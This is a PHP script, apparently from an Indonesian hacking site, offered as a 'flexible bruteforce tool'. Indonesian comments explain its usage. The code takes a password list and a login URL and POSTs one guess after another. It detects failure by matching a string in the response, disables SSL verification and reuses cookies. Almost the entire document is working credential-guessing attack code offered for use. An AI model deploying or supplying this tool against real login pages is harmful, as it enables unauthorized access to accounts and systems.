tool bruteforce fleksibel

1. <?php
2. /*
3. by Tu5b0l3d
4. http://www.indoxploit.or.id/2016/06/tool-bruteforce-fleksibel.html
5.  
6. #################################################################################
7.  
8. Usage: php brute.php password.txt "username=admin&password=PASS::fail" url
9.  
10. PASS jangan diganti!
11.  
12. password.txt
13. password_1<br>password_2<br>password_3
14.  
15. fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login
16. ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah
17.  
18. url ganti jadi url action loginnya.
19.  
20. ##################################################################################
21.  
22. example:
23. php brute.php Pass.txt "usernm=admin&pss=PASS::salah" http://site.com/login_act.php
24.  
25. */
26.  
27.  
28. if(is_file($argv[1]) && $argv[2]!="" && $argv[3]!=""){
29. $list = $argv[1];
30. $post_name_before = $argv[2];
31. $url = $argv[3];
32. $get_list = file_get_contents("$list");
33. $cok = explode("<br>", $get_list);
34.  
35. $param_failed = explode("::", $post_name_before);
36.  
37. foreach($cok as $pass){
38. $post_name = str_replace("PASS", $pass, $param_failed[0]);
39.  echo "\n$post_name\n";
40. $kirim = kirim($url, $post_name);
41. if(preg_match("/$param_failed[1]/i", $kirim)){
42.     echo "$pass <= No\n\n";
43. }
44. else{
45.     echo "$pass <====================== Yes\n\n";
46.     break;
47. }
48. }
49. }
50. else{
51.     echo "\n\nUsage: php $argv[0] password.txt \"username=admin&password=PASS:fail\" url\n# PASS jangan diganti\n\n# password.txt\npassword_1<br>password_2<br>password_3\n\n# fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah\n\n# url ganti jadi url action loginnya\n\nexample:\nphp brute.php Pass.txt \"usernm=admin&pss=PASS::salah\" http://site.com/login_act.php\n\n";
52. }
53.  
54. function kirim($url, $isi){
55.     $ch = curl_init ("$url");
56. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
57. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
58. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
59. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
60. curl_setopt ($ch, CURLOPT_POST, 1);
61. curl_setopt ($ch, CURLOPT_POSTFIELDS, "$isi");
62. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
63. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
64. $masuk = curl_exec ($ch);
65. return $masuk;
66. }
67.  
68. ?>